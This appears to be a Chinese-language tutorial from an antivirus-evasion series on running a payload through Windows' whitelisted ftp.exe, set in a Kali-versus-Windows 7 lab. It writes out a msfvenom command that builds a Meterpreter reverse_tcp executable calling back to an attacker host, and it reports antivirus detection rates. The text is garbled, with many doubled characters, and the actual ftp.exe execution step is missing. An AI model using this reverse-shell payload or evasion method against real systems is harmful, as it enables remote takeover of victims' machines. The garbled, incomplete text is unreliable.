远控免杀专题(41)-白名单Ftp.exe执行payload

Justin

一、Ftp.exe简介
Ftp.exe是Windows本身⾃自带的⼀一个程序，属于微软FTP⼯工具，提供基本的FTP访问。
Ftp.exe所在路路径已被系统添加PATH环境变量量中。因此，Ftp.exe命令可识别。
Windows 2003 默认位置：

1. C:\Windows\System32\ftp.exe
   
2. C:\Windows\SysWOW64\ftp.exe

复制代码

Windows 7 默认位置：

1. C:\Windows\System32\ftp.exe
   
2. C:\Windows\SysWOW64\ftp.exe

复制代码

由于⽩白名单加载payload的免杀测试需要结合杀软的⾏行行为检测才合理理，查杀⽩白名单⽂文
件都没有任何意义，payload⽂文件的查杀率依赖于对payload的免杀处理理，所以这⾥里里
对⽩白名单程序的免杀效果不不做评判。


二、使⽤用Ftp.exe执⾏行行Payload
复现环境：
靶机win7
攻击机 kali 192.168.19.128

1、配置攻击机MSF；


2、使⽤用msfvenom⽣生成shellcode；

1. msfvenom -a x86 --platform windows -p
   
2. windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=4444 -f
   
3. exe > shellcode.exe

复制代码

3、靶机执⾏行行恶意shellcode；




三、总结

由于shellcode.exe使⽤用msfvenom⽣生成的原⽣生态shellcode，因此360、⽕火绒均会报警。

由于shellcode的源码使⽤用msfvenom⽣生成，所以VT查杀相对较⾼高，查杀率：48/61。